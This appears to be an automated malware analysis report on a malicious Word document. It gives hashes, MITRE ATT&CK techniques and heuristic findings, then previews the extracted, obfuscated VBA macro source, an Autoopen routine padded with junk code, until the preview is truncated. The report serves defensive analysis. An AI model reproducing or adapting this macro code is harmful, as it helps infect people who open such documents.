Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 164222b3be80f9ef…

MALICIOUS

Office (OLE)

171.0 KB Created: 2018-04-26 19:50:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 4d85d0ffa969f12556d7745e05ca9abd SHA-1: 6796d832baccfbf7f70d496e0610d60889b7b1f2 SHA-256: 164222b3be80f9ef57549877b400ebe0479c31cc6c9344d0833701adf6985938
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros, indicated by the OLE_VBA_MACROS and OLE_VBA_AUTOOPEN heuristics. The critical OLE_VBA_SHELL firing suggests the macro uses the Shell() function, a common method for executing arbitrary commands or downloading secondary payloads. The Autoopen marker further confirms the macro is designed to execute automatically upon opening the document.

Heuristics 5

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 57347 bytes
SHA-256: 91d4809cd9d829c285629940a6ac2870758e35c8da0f2b1c3b4a31fa643d4e75
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "GuwFPTcvSX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub RdaKs(EDtwB)
Select Case CrAjvD
         Case 11003
            wtGhqV = izZuj
            VpQYv = Round(42378)
            XsZZQ = Hex(XXYjT - ChrW(EJFXWs))
            XEWDT = SFjBj
         Case 15381
            jELGU = CByte(63999)
            QzqKT = Log(ziOQS)
End Select
End Sub
Sub fawzBo(VwUqV)
Select Case YTNAww
         Case 6140
            bEaNMk = DnqQj
            cZiGJR = Round(29064)
            TvHUV = Hex(mmiQRO - ChrW(EWYjp))
            rRKiZ = wvuito
         Case 63378
            iHISsq = CByte(80130)
            RIZzUm = Log(CKWUN)
End Select
Select Case tIQhi
         Case 45473
            sHlcka = wOFrz
            PABFa = Round(34421)
            XrUWT = Hex(Qkwsl - ChrW(SqiJX))
            OtMboF = VzHtGL
         Case 13230
            MbBnO = CByte(16893)
            KpzVU = Log(jXjqiI)
End Select
Select Case YwwCO
         Case 82978
            TIrrji = GOhWJn
            iXdSkw = Round(77703)
            bCcCvs = Hex(fwYXJ - ChrW(CzFpqm))
            IzUUU = pbSjd
         Case 84966
            rhpOi = CByte(67329)
            tjjzm = Log(zjaXdu)
End Select
End Sub
Sub OSciI(hClMOv)
Select Case zGVIrK
         Case 13469
            jZPWhq = IBvGi
            wYFGGw = Round(3106)
            HXUCHi = Hex(LRjSnb - ChrW(tMLaqT))
            kRIMzD = PBkOFl
         Case 47744
            vTaMU = CByte(94259)
            OnuEOf = Log(ufFiEW)
End Select
Select Case MqIbL
         Case 91753
            vEipJ = RrAiwz
            CURup = Round(4447)
            HEIXh = Hex(wjdRl - ChrW(BUSjM))
            EobDf = jHVDrZ
         Case 27038
            JYIrvL = CByte(15930)
            uiOit = Log(vjjlEf)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case OvDYhn
         Case 49225
            trEDzz = LboAGz
            tozhtL = Round(78796)
            FUiBv = Hex(ESNYib - ChrW(qJiuq))
            VIzEY = UBPbAt
         Case 26762
            ZmkVzD = CByte(98727)
            JacYW = Log(DfTnDs)
End Select
dCzIVMCGIzH (KIQKO + sTuhFQAJhGL + bprMiU)
Select Case bEZJwm
         Case 38283
            zWbAQ = wjHNqV
            OdULj = Round(55297)
            RRNwD = Hex(RwFKqQ - ChrW(FLloJ))
            zcFjzn = MMaFwM
         Case 19051
            zhIczi = CByte(20621)
            izWZwS = Log(sfBld)
End Select
End Sub
Sub LiOKEZ(YAMdG)
Select Case IdcLMT
         Case 77949
            bmdOCu = iZwbj
            lzuSs = Round(8930)
            bdksT = Hex(JZPTo - ChrW(oRjvk))
            BfvqbP = abWii
         Case 87968
            OiCwB = CByte(70076)
            hkjTGI = Log(rjBDJ)
End Select
Select Case rZKkC
         Case 40559
            stnujZ = DGPlu
            BTuLX = Round(40226)
            uirVa = Hex(XcpYR - ChrW(juCozo))
            jnElUP = JUXiw
         Case 26540
            NvJBRU = CByte(15745)
            sOiwq = Log(GwfzW)
End Select
Select Case oUpzXF
         Case 32664
            DEKZD = Twsnf
            iiupC = Round(41775)
            vDVsh = Hex(cssGMd - ChrW(DswnE))
            ubuHG = RCGKZz
         Case 90683
            fVMhM = CByte(55981)
            aVarjJ = Log(RlfHl)
End Select
End Sub
Sub azBvPA(ZWiSG)
Select Case bjijR
         Case 51502
            KUGUPa = wkViSN
            bhTRS = Round(24120)
            YEmHl = Hex(hmjEO - ChrW(KjGrjf))
            RRoAEz = PAwOPz
         Case 27389
            mQUNi = CByte(20395)
            MBQQm = Log(RUqml)
End Select
End Sub

Attribute VB_Name = "uwkDiHszhnU"
Sub PSzzqW(AiQEm)
Select Case oNpzfH
         Case 53868
            WTRBMm = mKTYh
            AUFUiU = Round(35900)
            wdrzTu = Hex(CCBfsM - ChrW(wfvdkO))
            TzjFJ = skcBnJ
         
... (truncated)